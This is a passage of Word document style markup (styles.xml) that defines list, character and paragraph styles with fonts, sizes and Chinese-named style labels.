  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num30z1">
    <w:name w:val="WW8Num30z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num30z5">
    <w:name w:val="WW8Num30z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num34z1">
    <w:name w:val="WW8Num34z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num34z2">
    <w:name w:val="WW8Num34z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num34z3">
    <w:name w:val="WW8Num34z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num34z4">
    <w:name w:val="WW8Num34z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num35z0">
    <w:name w:val="WW8Num35z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num35z2">
    <w:name w:val="WW8Num35z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num42z3">
    <w:name w:val="WW8Num42z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num43z0">
    <w:name w:val="WW8Num43z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num43z1">
    <w:name w:val="WW8Num43z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num43z2">
    <w:name w:val="WW8Num43z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num43z3">
    <w:name w:val="WW8Num43z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num43z5">
    <w:name w:val="WW8Num43z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num45z1">
    <w:name w:val="WW8Num45z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num46z0">
    <w:name w:val="WW8Num46z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num46z2">
    <w:name w:val="WW8Num46z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num46z3">
    <w:name w:val="WW8Num46z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num46z4">
    <w:name w:val="WW8Num46z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num47z3">
    <w:name w:val="WW8Num47z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num51z3">
    <w:name w:val="WW8Num51z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num52z0">
    <w:name w:val="WW8Num52z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num52z2">
    <w:name w:val="WW8Num52z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num54z2">
    <w:name w:val="WW8Num54z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num57z0">
    <w:name w:val="WW8Num57z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num64z3">
    <w:name w:val="WW8Num64z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num65z3">
    <w:name w:val="WW8Num65z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num66z0">
    <w:name w:val="WW8Num66z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num66z1">
    <w:name w:val="WW8Num66z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num66z2">
    <w:name w:val="WW8Num66z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num66z3">
    <w:name w:val="WW8Num66z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num70z0">
    <w:name w:val="WW8Num70z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num70z1">
    <w:name w:val="WW8Num70z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num70z3">
    <w:name w:val="WW8Num70z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num70z5">
    <w:name w:val="WW8Num70z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num78z0">
    <w:name w:val="WW8Num78z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num78z1">
    <w:name w:val="WW8Num78z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num78z2">
    <w:name w:val="WW8Num78z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num78z3">
    <w:name w:val="WW8Num78z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num81z0">
    <w:name w:val="WW8Num81z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num84z2">
    <w:name w:val="WW8Num84z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="默认段落字体1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharChar">
    <w:name w:val="Char Char"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="批注引用1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="6TimesNewRomanChar">
    <w:name w:val="样式 标题 6 + (西文) Times New Roman (中文) 宋体 Char"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="content1">
    <w:name w:val="content1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="txt">
    <w:name w:val="txt"/>
    <w:basedOn w:val="16"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windy1">
    <w:name w:val="windy1"/>
    <w:basedOn w:val="16"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fonttitle">
    <w:name w:val="font_title"/>
    <w:basedOn w:val="16"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="正文缩进1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharChar0">
    <w:name w:val="标题 Char Char"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AuthorChar">
    <w:name w:val="Author Char"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading">
    <w:name w:val="Heading"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="af8"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:keepNext/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="文鼎PL细上海宋Uni" w:eastAsia="文鼎PL细上海宋Uni" w:hAnsi="文鼎PL细上海宋Uni" w:cs="文鼎PL细上海宋Uni"/>
      <w:kern w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afd">
    <w:name w:val="List"/>
    <w:basedOn w:val="af8"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="720"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:firstLine="425"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:spacing w:val="-5"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Index">
    <w:name w:val="Index"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Caption1">
    <w:name w:val="Caption1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:kern w:val="1"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="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f8"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="0" w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Times New Roman"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="19">
    <w:name w:val="文档结构图1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CharCharCharCharCharCharCharCharCharCharCharChar">
    <w:name w:val="Char Char Char Char Char Char Char Char Char Char Char Char"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Author">
    <w:name w:val="Author"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="120"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CT">
    <w:name w:val="CT"/>
    <w:basedOn w:val="2"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:keepLines w:val="0"/>
      <w:widowControl/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="576"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="576" w:hanging="576"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="44"/>
      <w:kern w:val="1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="de-DE" w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1a">
    <w:name w:val="批注文字1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1b">
    <w:name w:val="批注框文本1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="42">
    <w:name w:val="样式 标题 4 + 四号"/>
    <w:basedOn w:val="4"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="372" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体"/>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="6TimesNewRoman">
    <w:name w:val="样式 标题 6 + (西文) Times New Roman (中文) 宋体"/>
    <w:basedOn w:val="6"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="314" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1c">
    <w:name w:val="样式 标题 1 +"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="af8"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="480" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CharCharCharCharCharCharCharCharCharCharCharCharCharCharCharChar">
    <w:name w:val="Char Char Char Char Char Char Char Char Char Char Char Char Char Char Char Char"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1d">
    <w:name w:val="题注1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Arial"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1e">
    <w:name w:val="批注主题1"/>
    <w:basedOn w:val="1a"/>
    <w:next w:val="1a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="24">
    <w:name w:val="正文缩进2"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:ind w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afe">
    <w:name w:val="段前段后"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="0" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:sz w:val="10"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f">
    <w:name w:val="普通(网站)1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="280" w:after="280"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:kern w:val="1"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Charc"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="62" w:after="31" w:line="264" w:lineRule="auto"/>
      <w:ind w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Charc">
    <w:name w:val="正文文本缩进 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aff"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff0">
    <w:name w:val="我的列表"/>
    <w:basedOn w:val="24"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="840"/>
      </w:tabs>
      <w:ind w:left="840" w:hanging="315"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
